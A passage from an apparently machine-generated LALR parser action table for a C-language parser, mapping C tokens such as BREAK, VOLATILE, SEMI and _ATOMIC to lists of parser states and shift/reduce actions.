163,-28,-337,163,-11,163,163,-220,163,163,163,-284,163,163,163,-337,163,-225,-224,-222,-84,163,163,163,-226,-223,163,-228,-227,]),'BREAK':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,304,-336,-76,-79,-82,-75,-77,304,-81,-215,-214,-80,-216,304,-78,-69,-234,-233,-231,304,-217,-230,304,-84,-218,304,-229,-232,-221,304,-83,-219,-68,304,-220,304,304,-225,-224,-222,-84,304,304,-226,-223,304,-228,-227,]),'VOLATILE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[58,58,-113,-128,58,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,58,-120,-115,-65,-102,58,-131,-108,-238,-111,58,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,58,58,-119,58,-114,-130,58,-118,-71,-103,58,-131,-96,-98,58,-131,-95,-101,-97,58,-53,58,58,-88,58,58,-147,-335,-146,58,-167,-166,58,-182,-100,-126,58,58,-87,-61,-72,58,58,-144,-142,58,58,58,-73,58,-89,58,58,58,-149,-159,-160,-156,-336,58,-183,-30,58,58,58,58,58,-74,58,58,58,58,-174,-175,58,-143,-140,58,-141,-145,58,-76,-79,-82,-75,-77,58,-81,-215,-214,-80,-216,-78,-127,58,-153,58,-151,-148,-157,-168,-69,-36,-35,58,58,58,-234,-233,58,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,58,58,-229,-232,-221,-83,-219,-68,-33,-32,58,58,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PPPRAGMA':([0,14,16,17,19,25,38,45,47,59,61,97,99,119,123,124,180,181,184,185,186,188,189,190,191,223,284,285,286,289,291,298,300,301,302,303,305,307,308,313,315,318,332,424,425,428,429,432,435,437,438,439,440,446,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[61,-64,-60,-67,-66,-65,-63,-62,-70,61,-71,-335,61,-87,-61,-72,-73,61,61,61,61,-159,-160,-156,-336,-74,-76,-79,-82,-75,-77,61,-81,-215,-214,-80,-216,61,-78,61,61,-157,-69,-234,-233,-231,61,-217,-230,61,-84,-218,61,-158,-229,-232,-221,61,-83,-219,-68,61,-220,61,61,-225,-224,-222,-84,61,61,-226,-223,61,-228,-227,]),'INLINE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[30,30,-113,-128,30,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,30,-120,-115,-65,-102,30,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,30,30,-119,30,-114,-130,30,-118,-71,-103,30,-131,-96,-98,30,-131,-95,-101,-97,-53,30,30,-88,30,-147,-335,-146,-167,-166,-100,-126,30,-87,-61,-72,30,-73,30,-89,-149,-336,-30,30,-74,-174,-175,30,-76,-79,-82,-75,-77,30,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,30,30,30,-234,-233,30,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,30,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'INT_CONST_BIN':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,164,-335,-28,-182,-27,164,-337,-87,-72,-337,164,-286,-285,164,164,-283,-287,-288,164,-284,164,164,164,-336,-183,164,164,-28,-337,164,-28,-337,-337,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,-337,-76,-79,-82,-75,164,-77,164,164,-81,-215,-214,-80,-216,164,-78,164,164,-69,-284,164,164,-284,164,164,-244,-247,-245,-241,-242,-246,-248,164,-250,-251,-243,-249,-12,164,164,-11,164,164,164,164,-234,-233,164,-231,164,164,-217,164,-230,164,-84,-218,164,164,164,-337,-337,-198,164,164,164,-337,-284,-229,-232,164,-221,164,-83,-219,-68,164,-28,-337,164,-11,164,164,-220,164,164,164,-284,164,164,164,-337,164,-225,-224,-222,-84,164,164,164,-226,-223,164,-228,-227,]),'DO':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,307,-336,-76,-79,-82,-75,-77,307,-81,-215,-214,-80,-216,307,-78,-69,-234,-233,-231,307,-217,-230,307,-84,-218,307,-229,-232,-221,307,-83,-219,-68,307,-220,307,307,-225,-224,-222,-84,307,307,-226,-223,307,-228,-227,]),'LNOT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,165,-335,-28,-182,-27,165,-337,-87,-72,-337,165,-286,-285,165,165,-283,-287,-288,165,-284,165,165,165,-336,-183,165,165,-28,-337,165,-28,-337,-337,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,-337,-76,-79,-82,-75,165,-77,165,165,-81,-215,-214,-80,-216,165,-78,165,165,-69,-284,165,165,-284,165,165,-244,-247,-245,-241,-242,-246,-248,165,-250,-251,-243,-249,-12,165,165,-11,165,165,165,165,-234,-233,165,-231,165,165,-217,165,-230,165,-84,-218,165,165,165,-337,-337,-198,165,165,165,-337,-284,-229,-232,165,-221,165,-83,-219,-68,165,-28,-337,165,-11,165,165,-220,165,165,165,-284,165,165,165,-337,165,-225,-224,-222,-84,165,165,165,-226,-223,165,-228,-227,]),'CONST':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[3,3,-113,-128,3,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,3,-120,-115,-65,-102,3,-131,-108,-238,-111,3,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,3,3,-119,3,-114,-130,3,-118,-71,-103,3,-131,-96,-98,3,-131,-95,-101,-97,3,-53,3,3,-88,3,3,-147,-335,-146,3,-167,-166,3,-182,-100,-126,3,3,-87,-61,-72,3,3,-144,-142,3,3,3,-73,3,-89,3,3,3,-149,-159,-160,-156,-336,3,-183,-30,3,3,3,3,3,-74,3,3,3,3,-174,-175,3,-143,-140,3,-141,-145,3,-76,-79,-82,-75,-77,3,-81,-215,-214,-80,-216,-78,-127,3,-153,3,-151,-148,-157,-168,-69,-36,-35,3,3,3,-234,-233,3,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,3,3,-229,-232,-221,-83,-219,-68,-33,-32,3,3,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LSHIFT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,244,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,244,-262,-260,244,244,244,-259,244,244,-257,-256,244,244,244,244,244,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'LOR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,243,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,167,-335,-28,-182,-27,167,-337,-87,-72,-337,167,-286,-285,167,167,-283,-287,-288,167,-284,167,167,167,-336,-183,167,167,-28,-337,167,-28,-337,-337,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,-337,-76,-79,-82,-75,167,-77,167,167,-81,-215,-214,-80,-216,167,-78,167,167,-69,-284,167,167,-284,167,167,-244,-247,-245,-241,-242,-246,-248,167,-250,-251,-243,-249,-12,167,167,-11,167,167,167,167,-234,-233,167,-231,167,167,-217,167,-230,167,-84,-218,167,167,167,-337,-337,-198,167,167,167,-337,-284,-229,-232,167,-221,167,-83,-219,-68,167,-28,-337,167,-11,167,167,-220,167,167,167,-284,167,167,167,-337,167,-225,-224,-222,-84,167,167,167,-226,-223,167,-228,-227,]),'U16STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,166,-335,-28,-182,-27,166,-337,-87,-72,-337,166,-286,-285,-330,166,-327,166,-283,-287,238,-328,-288,-329,166,-284,166,166,166,-336,-183,166,166,-28,-337,166,-28,-337,-337,166,166,166,-334,-332,-331,-333,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,-337,-76,-79,-82,-75,166,-77,166,166,-81,-215,-214,-80,-216,166,-78,166,166,-69,-284,166,166,-284,166,166,-244,-247,-245,-241,-242,-246,-248,166,-250,-251,-243,-249,-12,166,166,-11,166,166,166,166,-234,-233,166,-231,166,166,-217,166,-230,166,-84,-218,166,166,166,-337,-337,-198,166,166,166,-337,-284,-229,-232,166,-221,166,-83,-219,-68,166,-28,-337,166,-11,166,166,-220,166,166,166,-284,166,166,166,-337,166,-225,-224,-222,-84,166,166,166,-226,-223,166,-228,-227,]),'RBRACE':([61,97,99,119,124,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,181,184,185,186,188,189,190,191,195,196,197,224,225,227,228,230,232,234,235,236,237,238,261,263,268,273,284,285,286,289,291,298,300,301,302,303,305,306,308,309,313,315,318,325,326,327,332,370,374,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,424,425,428,432,435,437,438,439,446,450,451,468,469,472,473,476,478,480,482,483,487,496,497,500,505,506,510,523,524,528,536,546,547,550,551,554,555,557,558,565,575,576,578,579,],[-71,-335,191,-87,-72,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-337,191,191,191,-159,-160,-156,-336,-171,191,-176,-274,-239,-337,-193,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-76,-79,-82,-75,-77,-6,-81,-215,-214,-80,-216,-5,-78,191,191,191,-157,191,191,-172,-69,191,-22,-21,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-234,-233,-231,-217,-230,-81,-84,-218,-158,-173,-177,-240,-194,191,-196,-237,-281,-282,-290,-291,-275,-229,-232,-221,-83,-219,-68,-195,-254,191,-220,-197,-306,191,-299,-225,-224,-222,-84,-300,-226,-223,-228,-227,]),'_BOOL':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[34,-337,-113,-128,34,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,34,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,34,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,34,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,34,-131,-95,-101,-97,34,-53,-126,34,-88,34,34,-93,34,-147,-335,-146,34,-167,-166,-182,-100,-126,34,-87,-90,-94,-92,-61,-72,34,-144,-142,34,34,34,-73,34,-89,34,34,34,-149,-159,-160,-156,-336,34,-183,-30,34,34,-74,34,34,34,34,-174,-175,34,-143,-140,34,-141,-145,-76,-79,-82,-75,-77,34,-81,-215,-214,-80,-216,-78,-127,34,-153,34,-151,-148,-157,-168,-69,-36,-35,34,34,34,-234,-233,34,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,34,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,246,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,246,-262,-260,-264,246,-263,-259,-266,246,-257,-256,-265,246,246,246,246,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SEMI':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,70,71,73,74,75,76,77,78,79,80,81,82,83,84,86,87,89,91,94,96,97,98,99,100,101,108,109,110,111,113,114,115,119,120,121,122,123,124,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,179,180,181,184,185,186,187,188,189,190,191,192,200,216,217,223,224,225,226,228,230,232,234,235,236,237,238,240,241,261,263,268,269,272,273,275,279,280,284,285,286,288,289,290,291,293,294,298,300,301,302,303,304,305,306,307,308,310,312,313,314,315,316,317,318,320,321,322,323,324,328,330,331,332,340,341,355,356,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,423,424,425,426,427,428,429,432,433,435,437,438,439,440,442,443,444,446,448,449,453,454,464,465,468,469,476,478,480,482,483,486,487,496,497,498,499,500,502,505,506,508,509,510,511,512,518,519,523,524,533,534,535,536,537,539,547,551,552,554,555,557,558,565,568,569,574,575,576,577,578,579,],[19,-337,-113,-128,-337,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,-337,-29,-121,-116,-62,-112,-70,-52,-123,-117,119,-337,-337,-119,-337,-114,-130,19,-118,-71,-103,-337,-9,-131,-91,-10,-96,-20,-98,-54,-179,-178,-131,-37,-134,-85,-95,-101,-97,-19,-132,-53,-126,-337,-337,-93,-147,-335,-146,188,-167,-166,-136,-100,-138,-126,-16,-86,-15,-87,-90,-94,-92,-61,-72,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-178,-73,-337,188,188,188,-149,-159,-160,-156,-336,-337,-30,-38,-133,-74,-274,-239,-135,-193,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,-235,-278,-140,-141,-145,-76,-79,-82,424,-75,425,-77,428,-14,-337,-81,-215,-214,-80,435,-216,-13,-337,-78,-312,-127,188,-153,188,-151,-148,-157,-26,-25,446,-161,-163,-168,-139,-137,-69,-36,-35,-44,-43,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,496,-234,-233,497,-337,-231,-337,-217,-13,-230,-81,-84,-218,-337,-152,-150,-165,-158,-170,-169,-31,-34,-39,-42,-240,-194,-237,-281,-282,-290,-291,-236,-275,-229,-232,533,-337,-221,-337,-83,-219,-162,-164,-68,-33,-32,-41,-40,-195,-254,-337,553,-337,-220,-337,-337,-306,-299,566,-225,-224,-222,-84,-300,575,-337,-337,-226,-223,-337,-228,-227,]),'_THREAD_LOCAL':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[11,11,-113,-128,11,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,11,-120,-115,-65,-102,11,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,11,11,-119,11,-114,-130,11,-118,-71,-103,11,-131,-96,-98,11,-131,-95,-101,-97,-53,11,11,-88,11,-147,-335,-146,-167,-166,-100,-126,11,-87,-61,-72,11,-73,11,-89,-149,-336,-30,11,-74,-174,-175,11,-76,-79,-82,-75,-77,11,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,11,11,11,-234,-233,11,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,11,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,248,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,248,-262,-260,-264,248,-263,-259,-266,248,-257,-256,-265,248,248,248,248,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'COMMA':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,70,71,73,74,75,76,77,78,80,81,82,84,86,96,98,100,101,103,104,105,106,108,109,110,111,113,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,177,178,179,187,191,195,196,197,198,199,200,203,210,211,212,213,215,216,217,224,225,226,228,230,232,234,235,236,237,238,240,241,261,263,268,269,270,272,273,274,275,276,277,279,280,281,283,294,310,312,314,316,317,320,323,324,325,326,327,328,330,331,340,341,343,344,345,346,347,348,355,356,374,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,414,426,442,443,444,448,449,450,451,453,454,458,461,463,464,465,468,469,473,476,478,480,482,483,486,487,489,490,492,501,503,507,508,509,511,512,518,519,523,524,525,528,529,530,531,532,544,545,546,547,551,556,559,560,564,565,570,571,],[-113,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-238,-111,-337,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-103,-96,126,-98,-54,-179,-178,-131,-37,-134,-95,-101,-97,-132,-53,-147,-146,-167,-166,-28,-180,-182,-27,-136,-100,-138,-126,202,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-337,-252,-178,-149,-336,-171,327,-176,-183,-181,-30,333,-186,-337,349,350,-191,-38,-133,-274,-239,-135,-193,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,412,-235,-278,-203,-140,-204,-1,-141,-145,-2,-206,412,-312,-127,-153,-151,-148,445,-161,-163,327,327,-172,-168,-139,-137,-36,-35,-190,-204,-56,-188,-45,-189,-44,-43,472,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,412,-270,-258,-296,-295,-294,-293,412,-292,-310,484,485,-305,-205,412,-152,-150,-165,-170,-169,-173,-177,-31,-34,-57,-192,-187,-39,-42,-240,-194,-196,-237,-281,-282,-290,-291,-236,-275,-213,-207,-211,412,412,412,-162,-164,-33,-32,-41,-40,-195,-254,-311,550,-209,-208,-210,-212,-51,-50,-197,-306,-299,412,-46,-49,412,-300,-48,-47,]),'U16CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,169,-335,-28,-182,-27,169,-337,-87,-72,-337,169,-286,-285,169,169,-283,-287,-288,169,-284,169,169,169,-336,-183,169,169,-28,-337,169,-28,-337,-337,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,-337,-76,-79,-82,-75,169,-77,169,169,-81,-215,-214,-80,-216,169,-78,169,169,-69,-284,169,169,-284,169,169,-244,-247,-245,-241,-242,-246,-248,169,-250,-251,-243,-249,-12,169,169,-11,169,169,169,169,-234,-233,169,-231,169,169,-217,169,-230,169,-84,-218,169,169,169,-337,-337,-198,169,169,169,-337,-284,-229,-232,169,-221,169,-83,-219,-68,169,-28,-337,169,-11,169,169,-220,169,169,169,-284,169,169,169,-337,169,-225,-224,-222,-84,169,169,169,-226,-223,169,-228,-227,]),'OFFSETOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,170,-335,-28,-182,-27,170,-337,-87,-72,-337,170,-286,-285,170,170,-283,-287,-288,170,-284,170,170,170,-336,-183,170,170,-28,-337,170,-28,-337,-337,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,-337,-76,-79,-82,-75,170,-77,170,170,-81,-215,-214,-80,-216,170,-78,170,170,-69,-284,170,170,-284,170,170,-244,-247,-245,-241,-242,-246,-248,170,-250,-251,-243,-249,-12,170,170,-11,170,170,170,170,-234,-233,170,-231,170,170,-217,170,-230,170,-84,-218,170,170,170,-337,-337,-198,170,170,170,-337,-284,-229,-232,170,-221,170,-83,-219,-68,170,-28,-337,170,-11,170,170,-220,170,170,170,-284,170,170,170,-337,170,-225,-224,-222,-84,170,170,170,-226,-223,170,-228,-227,]),'_ATOMIC':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,103,105,109,111,117,118,119,120,121,122,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,214,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460